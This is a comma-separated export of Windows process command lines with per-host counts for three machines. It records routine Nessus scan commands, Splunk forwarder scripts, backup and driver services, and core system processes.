%SystemRoot%\TEMP\nessus_W426FMMY.TMP nessus_W426FMMY.TXT""",1 we8105desk,"tasklist /svc",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"cmd /c ""tasklist /svc > %SystemRoot%\TEMP\nessus_task_listY42QJDIQ.TMP & ren %SystemRoot%\TEMP\nessus_task_listY42QJDIQ.TMP nessus_task_listY42QJDIQ.TXT""",1 we9041srv,"C:\Windows\system32\svchost.exe -k wsappx",1 we9041srv,"powershell ""Get-AppxPackage -AllUsers | select name, version, architecture, publisher | Format-List | out-string -width 4096""",1 we9041srv,"\??\C:\Windows\system32\conhost.exe 0xffffffff",1 we9041srv,"cmd /c powershell ""Get-AppxPackage -AllUsers | select name, version, architecture, publisher | Format-List | out-string -width 4096"" > %SystemRoot%\TEMP\nessus_R3OP3JQV.TMP & move %SystemRoot%\TEMP\nessus_R3OP3JQV.TMP %SystemRoot%\TEMP\nessus_R3OP3JQV.TXT",1 we9041srv,"netsh advfirewall show allprofiles firewallpolicy",1 we9041srv,"cmd /c netsh advfirewall show allprofiles firewallpolicy",1 we9041srv,"netsh advfirewall firewall show rule name=all verbose",1 we9041srv,"\??\C:\Windows\system32\conhost.exe 0xffffffff",1 we9041srv,"cmd /c netsh advfirewall firewall show rule name=all verbose > %SystemRoot%\TEMP\nessus_SV9VMSPT.TMP & cmd /c netsh advfirewall show allprofiles firewallpolicy >> %SystemRoot%\TEMP\nessus_SV9VMSPT.TMP & move %SystemRoot%\TEMP\nessus_SV9VMSPT.TMP %SystemRoot%\TEMP\nessus_SV9VMSPT.TXT",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we8105desk,"C:\Windows\system32\svchost.exe -k regsvc",1 we8105desk,"netsh wlan show interface",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"cmd /c netsh wlan show interface > %SystemRoot%\TEMP\nessus_IQK9FYH1.TMP & move %SystemRoot%\TEMP\nessus_IQK9FYH1.TMP %SystemRoot%\TEMP\nessus_IQK9FYH1.TXT",1 we8105desk,"C:\Windows\servicing\TrustedInstaller.exe",1 we8105desk,"netstat -ano",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe7_ Global\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"cmd /c ""netstat -ano > %SystemRoot%\TEMP\nessus_4UC962OK.TMP & ren %SystemRoot%\TEMP\nessus_4UC962OK.TMP nessus_4UC962OK.TXT""",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we1149srv,"c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v4.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm45a13fae-8ca5-408b-a9e4-631fc0631086 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 -ta 0",1 we9041srv,"tasklist /svc",1 we9041srv,"\??\C:\Windows\system32\conhost.exe 0xffffffff",1 we9041srv,"cmd /c ""tasklist /svc > %SystemRoot%\TEMP\nessus_task_listI8RC8S8K.TMP & ren %SystemRoot%\TEMP\nessus_task_listI8RC8S8K.TMP nessus_task_listI8RC8S8K.TXT""",1 we9041srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we9041srv,"netsh wlan show interface",1 we9041srv,"\??\C:\Windows\system32\conhost.exe 0xffffffff",1 we9041srv,"cmd /c netsh wlan show interface > %SystemRoot%\TEMP\nessus_JMJL39S5.TMP & move %SystemRoot%\TEMP\nessus_JMJL39S5.TMP %SystemRoot%\TEMP\nessus_JMJL39S5.TXT",1 we9041srv,"C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.16384_none_fa1dc1539b4180d8\TiWorker.exe -Embedding",1 we9041srv,"C:\Windows\servicing\TrustedInstaller.exe",1 we9041srv,"C:\Windows\system32\sppsvc.exe",1 we9041srv,"netstat -ano",1 we9041srv,"\??\C:\Windows\system32\conhost.exe 0xffffffff",1 we9041srv,"cmd /c ""netstat -ano > %SystemRoot%\TEMP\nessus_4LX6EPAV.TMP & ren %SystemRoot%\TEMP\nessus_4LX6EPAV.TMP nessus_4LX6EPAV.TXT""",1 we9041srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we9041srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we9041srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we1149srv,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding",1 we8105desk,"C:\Windows\system32\wermgr.exe -queuereporting",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe6_ Global\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11095_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11095 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ""1""",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11094_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11094 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ""1""",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe3_ Global\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"wmiadap.exe /F /T /R",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"taskhost.exe $(Arg0)",1 we8105desk,"C:\Windows\System32\sdclt.exe /CONFIGNOTIFICATION",1 we8105desk,"""C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe""",1 we8105desk,"C:\Windows\system32\sppsvc.exe",1 we8105desk,"""C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe""",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11092_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-67332772-3493699611-3403467266-11092 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ""1""",1 we8105desk,"""C:\Windows\system32\SearchFilterHost.exe"" 0 524 528 536 65536 532",1 we8105desk,"""C:\Windows\system32\SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""",1 we8105desk,"C:\Windows\system32\SearchIndexer.exe /Embedding",1 we8105desk,"C:\Windows\system32\SearchIndexer.exe /Embedding",1 we8105desk,"""C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe"" /DelayServices",1 we8105desk,"""C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe""",1 we8105desk,"""C:\Program Files (x86)\Common Files\Acronis\TibMounter\TibMounterMonitor.exe""",1 we8105desk,"""C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe""",1 we8105desk,"""C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe""",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"C:\Windows\SysWOW64\runonce.exe /Run6432",1 we8105desk,"""C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe""",1 we8105desk,"""C:\Program Files\Boot Camp\Bootcamp.exe""",1 we8105desk,"""C:\Windows\System32\igfxpers.exe""",1 we8105desk,"""C:\Windows\System32\hkcmd.exe""",1 we8105desk,"""C:\Windows\system32\igfxsrvc.exe"" -Embedding",1 we8105desk,"""C:\Windows\System32\igfxtray.exe""",1 we8105desk,"C:\Windows\Explorer.EXE",1 we8105desk,"""C:\Windows\system32\Dwm.exe""",1 we8105desk,"C:\Windows\system32\userinit.exe",1 we8105desk,"""taskhost.exe""",1 we8105desk,"C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}",1 we8105desk,"C:\Windows\System32\svchost.exe -k secsvcs",1 we8105desk,"taskhost.exe SYSTEM",1 we8105desk,"""C:\Windows\system32\WUDFHost.exe"" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:HostProcess-ac6024c6-0e8e-4905-9442-280600567282 -SystemEventPortName:HostProcess-47fb5318-ca0f-44a7-866d-cf286eabcb42 -IoCancelEventPortName:HostProcess-73811b94-bc88-4562-beac-f050c8c2e1ab -NonStateChangingEventPortName:HostProcess-487fce22-2fcf-4925-8557-9c32d3729e3e -ServiceSID:S-1-5-80-2652678385-582572993-1835434367-1344795993-749280709 -LifetimeId:9e02b3ab-0d2b-4e15-8682-744712c1ca2e",1 we8105desk,"C:\Windows\system32\svchost.exe -k bthsvcs",1 we8105desk,"C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation",1 we8105desk,"C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted",1 we8105desk,"cmd /c """"C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd"" --scheme""",1 we8105desk,"cmd /c """"C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd"" --scheme""",1 we8105desk,"cmd /c """"C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd"" --scheme""",1 we8105desk,"cmd /c """"C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd"" --scheme""",1 we8105desk,"cmd /c """"C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd"" --scheme""",1 we8105desk,"cmd /c """"C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd"" --scheme""",1 we8105desk,"cmd /c """"C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd"" --scheme""",1 we8105desk,"cmd /c """"C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd"" --scheme""",1 we8105desk,"cmd /c """"C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd"" --scheme""",1 we8105desk,"cmd /c """"C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd"" --scheme""",1 we8105desk,"C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"" _internal check-xml-files --answer-yes --no-prompt 2>&1",1 we8105desk,"C:\Windows\system32\cmd.exe /c btool server list general --no-log",1 we8105desk,"C:\Windows\system32\cmd.exe /c btool server list replication_port --no-log",1 we8105desk,"cscript.exe /nologo C:\Windows\TEMP\E5548D7D-7D5D-4693-A892-94129A925C26.vbs",1 we8105desk,"cscript.exe /nologo C:\Windows\TEMP\A1985133-B0BB-4771-9B34-54C1DC493370.vbs",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"cscript.exe /nologo C:\Windows\TEMP\5F336C48-BD3F-46AF-8FB1-E076BA7329CB.vbs",1 we8105desk,"C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"" _internal pre-flight-checks --answer-yes --no-prompt 2>&1",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -Embedding",1 we8105desk,"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",1 we8105desk,"C:\Windows\system32\cmd.exe /c btool server list kvstore --no-log",1 we8105desk,"C:\Windows\system32\cmd.exe /c btool server list general --no-log",1 we8105desk,"C:\Windows\system32\cmd.exe /c btool web list settings --no-log",1 we8105desk,"C:\Windows\Sysmon.exe",1 we8105desk,"C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"" _internal_extra_splunkd_service_args",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"\??\C:\Windows\system32\conhost.exe",1 we8105desk,"C:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"" _RAW_envvars",1 we8105desk,"""C:\Program Files (x86)\Common Files\Acronis\Infrastructure\mms_mini.exe""",1 we8105desk,"C:\Windows\system32\AppleTimeSrv.exe",1 we8105desk,"C:\Windows\system32\AppleOSSMgr.exe",1 we8105desk,"""C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe""",1 we8105desk,"""C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe""",1 we8105desk,"C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork",1 we8105desk,"C:\Windows\System32\spoolsv.exe",1 we8105desk,"C:\Windows\system32\svchost.exe -k NetworkService",1 we8105desk,"""C:\Windows\system32\WUDFHost.exe"" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:HostProcess-fa915abb-3e19-454d-abc3-af7084ddd6b2 -SystemEventPortName:HostProcess-ac8be148-87a6-4e0c-9c46-e06e1597f0ce -IoCancelEventPortName:HostProcess-c6ad7e19-54f2-46ea-af3f-88f7621e76ea -NonStateChangingEventPortName:HostProcess-b15c724e-59d6-4e9e-bba1-99864b9d80ce -ServiceSID:S-1-5-80-2652678385-582572993-1835434367-1344795993-749280709 -LifetimeId:584cb968-8b77-45ad-ae19-bbeb66853bc0",1 we8105desk,"""LogonUI.exe"" /flags:0x0",1 we8105desk,"C:\Windows\system32\svchost.exe -k LocalService",1 we8105desk,"winlogon.exe",1 we8105desk,"C:\Windows\system32\AUDIODG.EXE 0x2c8",1 we8105desk,"C:\Windows\system32\svchost.exe -k netsvcs",1 we8105desk,"C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted",1 we8105desk,"C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted",1 we8105desk,"C:\Windows\system32\svchost.exe -k RPCSS",1 we8105desk,"C:\Windows\system32\svchost.exe -k DcomLaunch",1 we8105desk,"C:\Windows\system32\lsm.exe",1 we8105desk,"C:\Windows\system32\lsass.exe",1 we8105desk,"C:\Windows\system32\services.exe",1 we8105desk,"%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16",1 we8105desk,"wininit.exe",1 we8105desk,"\SystemRoot\System32\smss.exe 00000001 00000048",1 we8105desk,"%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16",1 we8105desk,"\SystemRoot\System32\smss.exe 00000000 00000048",1 we8105desk,"\??\C:\Windows\system32\autochk.exe *",1 we8105desk,"\SystemRoot\System32\smss.exe",1 we8105desk,"C:\Windows\SysWOW64\DllHost.exe /Processid:{1EF75F33-893B-4E8F-9655-C3D602BA4897}",1 we8105desk,"C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding",1 we8105desk,"C:\Windows\system32\vssvc.exe",1 we8105desk,"""C:\Program Files (x86)\Common Files\Acronis\VssRequestor64\vss_requestor.exe"" -Embedding",1 we8105desk,"C:\Windows\system32\wermgr.exe -queuereporting",1